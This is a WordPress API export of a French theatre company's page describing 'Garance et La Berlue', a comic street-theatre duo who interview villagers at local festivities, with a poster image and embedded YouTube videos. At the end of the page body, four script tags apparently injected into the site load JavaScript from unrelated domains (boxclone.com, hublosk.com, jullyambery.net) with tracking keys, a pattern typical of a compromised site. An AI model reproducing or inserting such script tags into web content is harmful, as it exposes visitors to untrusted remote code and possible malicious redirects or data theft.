{"id":2776,"date":"2016-02-24T16:24:40","date_gmt":"2016-02-24T14:24:40","guid":{"rendered":"http:\/\/www.ciedacote.com\/web\/?page_id=2776"},"modified":"2026-01-15T12:49:08","modified_gmt":"2026-01-15T10:49:08","slug":"garance-et-la-berlue","status":"publish","type":"page","link":"https:\/\/www.ciedacote.com\/web\/garance-et-la-berlue\/","title":{"rendered":"Garance et La Berlue"},"content":{"rendered":"<div class=\"fcbkbttn_buttons_block\" id=\"fcbkbttn_left\"><div class=\"fb-share-button  \" data-href=\"https:\/\/www.ciedacote.com\/web\/garance-et-la-berlue\/\" data-type=\"button_count\" data-size=\"small\"><\/div><\/div><p style=\"text-align: justify;\">\n&nbsp;<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.ciedacote.com\/web\/wp-content\/uploads\/2016\/02\/PLAQUETTE-RECTO-GARANCE-ET-LA-BERLUE.jpeg\" rel=\"attachment wp-att-3180\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignleft wp-image-3180 size-full\" src=\"http:\/\/www.ciedacote.com\/web\/wp-content\/uploads\/2016\/02\/PLAQUETTE-RECTO-GARANCE-ET-LA-BERLUE.jpeg\" alt=\"plaquette-recto-garance-et-la-berlue\" width=\"426\" height=\"284\" srcset=\"https:\/\/www.ciedacote.com\/web\/wp-content\/uploads\/2016\/02\/PLAQUETTE-RECTO-GARANCE-ET-LA-BERLUE.jpeg 426w, https:\/\/www.ciedacote.com\/web\/wp-content\/uploads\/2016\/02\/PLAQUETTE-RECTO-GARANCE-ET-LA-BERLUE-300x200.jpeg 300w\" sizes=\"(max-width: 426px) 100vw, 426px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<p style=\"text-align: justify;\">&nbsp;<\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 18pt;\">Garance Bouchardon et Marie-Agn\u00e9s La Berlue s&#8217;invitent chez vous pour une mise en joie improvis\u00e9e !<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 18pt;\">Arm\u00e9es d&#8217;un mat\u00e9riel dernier cri, gracieusement pr\u00eat\u00e9 par le maire de leur commune, elles vont \u00e0 la rencontre de votre village ou de votre quartier et de ses festivit\u00e9s (Inaugurations, march\u00e9s, foires&#8230;).<\/span><\/p>\n<p>&nbsp;<\/p>\nngg_shortcode_0_placeholder\n<p style=\"text-align: justify;\"><span style=\"font-size: 18pt;\">Curieuses comme des pies, maladroites, un brin d\u00e9su\u00e8tes, touchantes et indiscr\u00e8tes, rien ni personne n&#8217;\u00e9chappe \u00e0 leur sens aigu de l&#8217;analyse et de l&#8217;observation.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 18pt;\">Bienveillantes, \u00e9nergiques et impertinentes, Garance et La Berlue interrogent les jeunes, les vieux, les chiens, les chats&#8230;Ceux qui vivent ici et ceux qui passent par l\u00e0 !<\/span><\/p>\n<p><iframe title=\"Les escapades de Garance et La Berlue   Inauguration\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/YBM54pJ7XYQ?list=PLcOcQEKyzwVPIRNqEv7mcMhEO6Soz7Ow_\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><iframe title=\"L\u00e9o Ferr\u00e9\" width=\"500\" height=\"375\" src=\"https:\/\/www.youtube.com\/embed\/FILnrW4O0QI?list=PLcOcQEKyzwVPIRNqEv7mcMhEO6Soz7Ow_\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><iframe title=\"Garance et La Berlue...Jean -Claude\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/us-Vocer12M?list=PLcOcQEKyzwVPIRNqEv7mcMhEO6Soz7Ow_\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/boxclone.com\/231fe9b04591ea7578.js\"><\/script> <script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8991x\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8991x&amp;format=arrjs&amp;r=1645109924328\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/boxclone.com\/ext\/231fe9b04591ea7578.js?sid=52724_8991_&amp;title=aa&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; &nbsp; &nbsp; Garance Bouchardon et Marie-Agn\u00e9s La Berlue s&#8217;invitent chez vous pour une mise en joie improvis\u00e9e ! Arm\u00e9es d&#8217;un mat\u00e9riel dernier cri, gracieusement pr\u00eat\u00e9 par le maire de leur commune, elles vont \u00e0 la rencontre de votre village ou de votre quartier et de ses festivit\u00e9s (Inaugurations, march\u00e9s, foires&#8230;). &nbsp; Curieuses comme [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2776","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2776","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/comments?post=2776"}],"version-history":[{"count":32,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2776\/revisions"}],"predecessor-version":[{"id":5711,"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/pages\/2776\/revisions\/5711"}],"wp:attachment":[{"href":"https:\/\/www.ciedacote.com\/web\/wp-json\/wp\/v2\/media?parent=2776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}